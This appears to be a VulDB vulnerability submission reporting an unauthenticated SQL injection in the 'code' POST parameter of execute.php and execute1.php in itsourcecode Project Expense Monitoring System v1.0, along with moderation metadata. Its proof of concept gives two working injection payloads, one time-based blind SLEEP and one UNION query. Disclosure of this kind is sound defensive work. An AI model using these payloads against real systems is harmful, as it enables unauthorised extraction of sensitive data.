| Title | itsourcecode Project Expense Monitoring System v1.0 SQLi |
|---|
| Description | Attackers do not need to log in to the backend. They can pass in the code parameter in the execute.php and execute1.php pages and construct special SQL statements to carry out SQLi injection attacks to obtain sensitive data.
POC:
Parameter: code (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: code=1' AND (SELECT 3055 FROM (SELECT(SLEEP(5)))qdgV) AND 'wCrt'='wCrt
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: code=1' UNION ALL SELECT NULL,CONCAT(0x717a717071,0x6a5158484166616e41746e696241666561674a53525661626877575a6f426454534d69745359456c,0x71786a7171),NULL,NULL,NULL,NULL,NULL,NULL-- - |
|---|
| Source | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-2.md |
|---|
| User | GUOTINGTING (UID 73614) |
|---|
| Submission | 08/17/2024 14:14 (2 years ago) |
|---|
| Moderation | 08/19/2024 16:12 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 275119 [itsourcecode Project Expense Monitoring System 1.0 execute.php sql injection] |
|---|
| Points | 20 |
|---|